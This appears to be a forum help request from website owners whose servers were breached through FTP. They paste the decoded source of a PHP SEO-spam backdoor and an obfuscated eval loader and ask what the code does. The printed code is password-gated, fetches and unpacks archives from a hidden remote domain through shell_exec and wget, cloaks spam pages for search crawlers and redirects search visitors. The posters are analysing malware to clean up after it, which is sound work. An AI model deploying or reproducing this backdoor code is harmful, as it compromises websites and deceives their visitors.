So someone hacked into my websites FTP account and deposited two files. I would like help decyphering what the hell they do, or rather how they do it.
File # 1 'coloratura-brigantine.php'
What I have figured out so far:
- $bupohq equates to "create_function"
- $nttigv equates to "create_function('$a', 'eval($a);')" I think anyway
- When the string is first reversed it starts with "eval(base64_decode(...));"
When the string is decoded into using the base64_decode it comes out with the following:
set_time_limit(0); function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 30); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec ($ch); curl_close($ch); return $result; } $doorcontent=""; [email protected]$_POST["pppp_check"]; $md5pass="e5e4570182820af0a183ce1520afe43b"; [email protected]$_SERVER["HTTP_HOST"]; [email protected]$_SERVER["REQUEST_URI"]; $host=str_replace("www.","",$host); $md5host=md5($host); $urx=$host.$uri; $md5urx=md5($urx); if (function_exists('sys_get_temp_dir')) { $tmppath = sys_get_temp_dir(); if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__)); } $cdir=$tmppath."/.".$md5host."/"; $domain=base64_decode("Zi5tZW55dWRueWEuY29t"); if ($x!=""){ $p=md5(base64_decode(@$_POST["p"])); if ($p!=$md5pass)return; [email protected]$_POST["pa"]; if (($x=="2")||($x=="4")){ echo "###UPDATING_FILES###\n"; if ($x=="2"){ $cmd="cd $tmppath; rm -rf .$md5host"; echo shell_exec($cmd); } $cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; if ($pa!=""){ $pa+=0; $cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; } echo shell_exec($cmd); exit; } if ($x=="3"){ echo "###WORKED###\n"; exit; } } else{ $curx=$cdir.$md5urx; if (@file_exists($curx)){ @list($IDpack,$mk,$doorcontent,$pdf,$contenttype)[email protected]("|||",@file_get_contents($curx)); [email protected]_decode($doorcontent); $bot=0; $se=0; $mobile=0; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1; if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1; if ($bot) { $pdf+=0; if ($pdf==1){ header("Content-Type: application/pdf"); } if ($pdf==2){ header("Content-Type: image/png"); } if ($pdf==3){ header("Content-Type: text/xml"); } if ($pdf==4){ [email protected]_decode($contenttype); $types=explode("\n",$contenttype); foreach($types as $val){ $val=trim($val); if($val!="")header($val); } } echo $doorcontent;exit; } if ($se) { echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk;=".rawurlencode($mk)."&d;=".$md5host."&u;=".$md5urx."&addr;=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]); exit; } header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found"); echo '' . "\n"; echo '' . "\n"; echo '' . "\n"; echo '' . "\n"; echo 'Not Found' . "\n"; echo 'The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.' . "\n"; echo '' . "\n"; echo '' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80' . "\n"; echo ''; exit; } else{ $crurl="http://"[email protected]$_SERVER['HTTP_HOST'][email protected]$_SERVER['REQUEST_URI']; $buf=get_page_by_curl($crurl); $curx=$cdir."fff.sess"; if (@file_exists($curx)){ [email protected]($curx,FILE_SKIP_EMPTY_LINES|FILE_IGNORE_NEW_LINES); [email protected]($links)-1; shuffle($links); if ($c>20)$c=20; $regexp = "]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>"; if(preg_match_all("/$regexp/siU", $buf, $matches)) { $zval=$matches[0]; shuffle($zval); foreach($zval as $val){ if ($c<0)break; list($l,$anchor)=explode("|||",trim($links[$c])); $new=''.$anchor.''; $buf=str_ireplace($val,$new,$buf); $c--; } } } echo $buf; } }
I have not done much with PHP up to this point, but I can follow along decently enough.
File #2
'; $kilohm ='0brV'; $lacks ='VNQ(?Fru'; $foursome = 'o'; $disambiguations ='F';$crashes= 'eeTsa('; $bowfin= 'm'; $bespeak= 'Wr]';$brice ='S'; $gospelers='1iP'; $clutched ='wf$_';$lamentable='(e5(Cjogm';$carport='s'; $gusella= 'Xa_:IPHR'; $bowlers ='a'; $gambler= '$Ua'; $bassoon = 'e';$gallinule = 'E'; $girls = 'c"r;TT['; $billy = ')(bRTi'; $expect='R'; $beverlie='c'; $bricklayer='"'; $alteration= '_';$drained = 'n'; $clad= 'I'; $discerned ='JpY;['; $magistrate= '/'; $kile = 'd'; $dumbness ='K,=,';$loners= 'a_t[K([';$digressive = '('; $err ='e'; $cleavland= 'na2$6';$graspingly='$'; $footsteps='r]"'; $couched = 'c'; $aspirating='.'; $cristiano='tvorc?';$infuriation= ')era'; $ambled='i'; $i = '_'; $annoyance ='A'; $dinnie= 'u'; $horseflesh='T'; $jolts ='j'; $kernels='$';$creditor ='"';$darelle ='(';$corners='P'; $calamitous = 'O'; $big= 'TeitsFOr'; $linus= '(';$helmsman = 'u'; $hemoglobin = 'G'; $interferingly='?'; $credenza =')$'; $bobine= 'O'; $devising = ';'; $documentary ='R"e'; $imaginable = $cristiano['4'] .$big['7'] .$documentary['2']. $infuriation[3] .$big['3'] .$documentary['2'] .$i . $clutched['1']. $helmsman. $cleavland['0'] . $cristiano['4']. $big['3'].$big['2'] . $cristiano['2'] . $cleavland['0'] ; $gleeful = $bluet['2']; $luisa = $imaginable($gleeful,$documentary['2'].$cristiano['1'] . $infuriation[3] . $likenesses['3'] .$linus.$infuriation[3]. $big['7'].$big['7']. $infuriation[3]. $likenesses['4'] . $i . $discerned['1'].$cristiano['2']. $discerned['1'] . $linus . $clutched['1'] .$helmsman . $cleavland['0']. $cristiano['4'] . $i .$lamentable['7']. $documentary['2'] .$big['3'].$i.$infuriation[3]. $big['7'] .$lamentable['7'].$big['4'].$linus . $credenza['0']. $credenza['0'].$credenza['0'] .$devising ); $luisa ($grottos, $interferingly , $linus, $assassinates[5], $gambler['1'], $grottos , $gambler['1'] , $documentary['1'], $distinctiveness[0] ,$discerned['0'], $cleavland['2'] , $lamentable['4'], $credenza[1].$big['2'] .$dumbness['2'] . $infuriation[3].$big['7']. $big['7']. $infuriation[3]. $likenesses['4']. $i . $lamentable['8'] . $documentary['2']. $big['7'] . $lamentable['7']. $documentary['2'] . $linus.$credenza[1]. $i .$documentary['0'] . $gallinule. $lacks['2'] .$gambler['1'] .$gallinule.$brice .$big[0] . $dumbness['3'] .$credenza[1].$i . $lamentable['4'].$bobine. $bobine .$loners['4'] . $clad . $gallinule . $dumbness['3']. $credenza[1].$i . $brice.$gallinule. $documentary['0'] . $lacks['0']. $gallinule . $documentary['0'].$credenza['0']. $devising.$credenza[1] .$infuriation[3].$dumbness['2'].$big['2'] . $big['4']. $big['4']. $documentary['2']. $big['3'] . $linus .$credenza[1]. $big['2']. $loners['6'] . $documentary['1'] . $cristiano['2'] .$billy['2'].$helmsman . $clutched['1'] . $lamentable['8'] .$jolts.$clutched['0'] .$cristiano['2'] . $documentary['1']. $footsteps['1']. $credenza['0'].$interferingly. $credenza[1]. $big['2'].$loners['6'].$documentary['1'] . $cristiano['2'] . $billy['2'] . $helmsman. $clutched['1']. $lamentable['8'] .$jolts.$clutched['0'] . $cristiano['2'].$documentary['1'] . $footsteps['1'] . $gusella['3']. $linus. $big['2']. $big['4']. $big['4']. $documentary['2'] . $big['3'].$linus .$credenza[1] . $big['2']. $loners['6'] . $documentary['1'].$gusella['6'] . $big[0]. $big[0] . $corners.$i. $bobine .$cubbyhole['1'].$gambler['1'].$big['5'] . $bobby['3'] . $discerned['0'] . $bespeak['0'] . $bobine. $documentary['1']. $footsteps['1'] . $credenza['0'] . $interferingly .$credenza[1] . $big['2'] .$loners['6'] . $documentary['1'] .$gusella['6']. $big[0]. $big[0] . $corners .$i.$bobine .$cubbyhole['1'] .$gambler['1'] . $big['5'] . $bobby['3'].$discerned['0'].$bespeak['0'].$bobine .$documentary['1'] .$footsteps['1']. $gusella['3']. $kile.$big['2']. $documentary['2'] .$credenza['0'] . $devising . $documentary['2'] . $cristiano['1']. $infuriation[3] .$likenesses['3'].$linus.$big['4'].$big['3']. $big['7'] . $big['7'] . $documentary['2']. $cristiano['1'].$linus. $billy['2'] . $infuriation[3].$big['4'] . $documentary['2'] .$cleavland[4] . $crossbars[1].$i . $kile.$documentary['2'] . $cristiano['4'].$cristiano['2'] . $kile .$documentary['2']. $linus.$big['4'] . $big['3'].$big['7'] . $big['7'].$documentary['2'] .$cristiano['1'] .$linus. $credenza[1] .$infuriation[3].$credenza['0'] .$credenza['0'] . $credenza['0'] .$credenza['0'] . $devising );
Again I can sort of follow along with the code.
So basically what this did was it would do some URL injection using various porn Strings, Big black asses.html, nude_teens_fucking.html etc.. you get the idea. Anyway, I would ask for some help in understanding how the hell this thing works. As far as I can tell it doesn't actually do anything malicious other than do some url injection, so I cannot think of why someone would waste their time doing it.
I've since removed files, removed the reference in my php config file referencing the first file, and changed the user name and password for the FTP account.
I was looking at this and was sort of amazed the length that this person went to to basically just be a pain in the ass. PHP seems like a much more powerful language than I first thought.
Google told me my site had an injection attack of the format:
http://www.MYWEBSITESURL.com/sexy-red-headed-woman ...or something like that. So I logged in to my html directory and found nothing of the sort. I did however find these two php files in there. Of course I have changed my password and deleted the files, but can anybody tell what these scripts are supposed to do?
http://pastebin.com/mSdyw7Xz http://pastebin.com/XLSaTQMB That first one has a funny reversed, base64 encoded blob that was easy to translate:
set_time_limit(0); function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 30); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec ($ch); curl_close($ch); return $result; } $doorcontent=""; [email protected]$_POST["pppp_check"]; $md5pass="e5e4570182820af0a183ce1520afe43b"; [email protected]$_SERVER["HTTP_HOST"]; [email protected]$_SERVER["REQUEST_URI"]; $host=str_replace("www.","",$host); $md5host=md5($host); $urx=$host.$uri; $md5urx=md5($urx); if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();} else {$tmppath = (dirname(__FILE__));} $cdir=$tmppath."/.".$md5host."/"; $domain=base64_decode("eDMubWVnYWxvbGlrLmNvbQ=="); if ($x!=""){ $p=md5(base64_decode(@$_POST["p"])); if ($p!=$md5pass)return; if (($x=="2")||($x=="4")){ echo "###UPDATING_FILES###\n"; if ($x=="2"){ $cmd="cd $tmppath; rm -rf .$md5host"; echo shell_exec($cmd); } $cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; echo shell_exec($cmd); exit; } if ($x=="3"){ echo "###WORKED###\n";exit; } }else{ $curx=$cdir.$md5urx; if (@file_exists($curx)){ @list($IDpack,$mk,$doorcontent)[email protected]("|||",@base64_decode(@file_get_contents($curx))); $bot=0; $se=0; $mobile=0; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1; if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1; if ($bot) {echo $doorcontent;exit;} if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk;=".rawurlencode($mk)."&d;=".$md5host."&u;=".$md5urx."&addr;=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;} header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found"); echo '' . "\n"; echo '' . "\n"; echo '404 Not Found' . "\n"; echo '' . "\n"; echo 'Not Found
' . "\n"; echo 'The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.
' . "\n"; echo '
' . "\n"; echo '' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80' . "\n"; echo ''; exit; }else{ $crurl="http://"[email protected]$_SERVER['HTTP_HOST'][email protected]$_SERVER['REQUEST_URI']; echo get_page_by_curl($crurl); } }